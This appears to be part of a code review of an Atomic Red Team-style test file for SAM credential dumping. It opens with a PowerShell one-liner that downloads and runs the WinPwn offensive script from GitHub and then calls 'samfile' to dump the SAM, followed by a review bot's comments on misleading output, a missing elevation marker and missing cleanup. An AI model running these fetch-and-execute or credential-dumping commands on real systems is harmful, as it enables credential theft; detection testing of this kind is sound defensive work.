iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive
```
<br/>
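Review bot: in Atomic Test #4 the first attack command prints `STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON`, but nothing in the block touches Defender or sets any bypass; it only imports `PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1` and calls `Invoke-PowerDump`. The message misdescribes what the test does and will mislead anyone matching console output against telemetry, so it should be removed or changed to state that PowerDump is being loaded. Also, Atomic Test #7 is listed as `Run with powershell!` with no `Elevation Required` marker, while the ATT&CK text at the top of this file says enumerating the SAM requires SYSTEM-level access and Tests #1 through #4 all carry the marker; unless WinPwn's `samfile` elevates on its own, the marker should be added, and a cleanup command for whatever `samfile` writes to disk is missing as well.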

Some files were not shown because too many files have changed in this diff.